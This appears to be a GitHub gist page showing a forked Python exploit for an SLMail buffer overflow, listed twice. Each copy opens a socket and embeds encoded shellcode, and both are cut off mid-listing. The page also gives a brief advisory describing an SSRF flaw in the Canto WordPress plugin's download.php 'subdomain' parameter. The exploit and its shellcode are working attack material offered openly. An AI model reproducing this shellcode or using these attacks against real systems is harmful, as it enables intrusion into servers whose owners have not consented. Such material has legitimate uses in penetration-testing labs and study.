Skip to content

Instantly share code, notes, and snippets.

Avatar

Hakooraevil

View GitHub Profile
@Hakooraevil
Hakooraevil / slmailexploit.py
Created Nov 11, 2020 — forked from loopspell/slmailexploit.py
SLMail Buffer Overflow
View slmailexploit.py
#!/usr/bin/python
import socket
# Final Exploit
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
shellcode = ("\xdb\xcd\xbf\x3b\x30\xa2\x04\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x52\x31\x7d\x17\x03\x7d\x17\x83\xd6\xcc\x40\xf1\xd4\xc5\x07"
"\xfa\x24\x16\x68\x72\xc1\x27\xa8\xe0\x82\x18\x18\x62\xc6\x94"
"\xd3\x26\xf2\x2f\x91\xee\xf5\x98\x1c\xc9\x38\x18\x0c\x29\x5b"
"\x9a\x4f\x7e\xbb\xa3\x9f\x73\xba\xe4\xc2\x7e\xee\xbd\x89\x2d"
@Hakooraevil
Hakooraevil / slmailexploit.py
Created Nov 11, 2020 — forked from loopspell/slmailexploit.py
SLMail Buffer Overflow
View slmailexploit.py
#!/usr/bin/python
import socket
# Final Exploit
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
shellcode = ("\xdb\xcd\xbf\x3b\x30\xa2\x04\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x52\x31\x7d\x17\x03\x7d\x17\x83\xd6\xcc\x40\xf1\xd4\xc5\x07"
"\xfa\x24\x16\x68\x72\xc1\x27\xa8\xe0\x82\x18\x18\x62\xc6\x94"
"\xd3\x26\xf2\x2f\x91\xee\xf5\x98\x1c\xc9\x38\x18\x0c\x29\x5b"
"\x9a\x4f\x7e\xbb\xa3\x9f\x73\xba\xe4\xc2\x7e\xee\xbd\x89\x2d"
@Hakooraevil
Hakooraevil / CVE-2020-24063
Last active Nov 9, 2020
SSRF in Canto Plugin for Wordpress (CVE-2020-24063)
View CVE-2020-24063
#Description
The Canto plugin 1.3.0 for WordPress allows includes/lib/download.php?subdomain= SSRF.
"subdomain" parameter in Canto WordPress Plugin is vulnerable to
Server-Side Request Forgery (SSRF) which allows an attacker to make a
request to an internal or external server & retrieve content hosted on
the server. Due to this, an attacker can perform attacks such as
Cross-Site Scripting, Cross-Site Port Attack, abuse Cross-Origin
resource sharing, or access internal resources hosted on the server.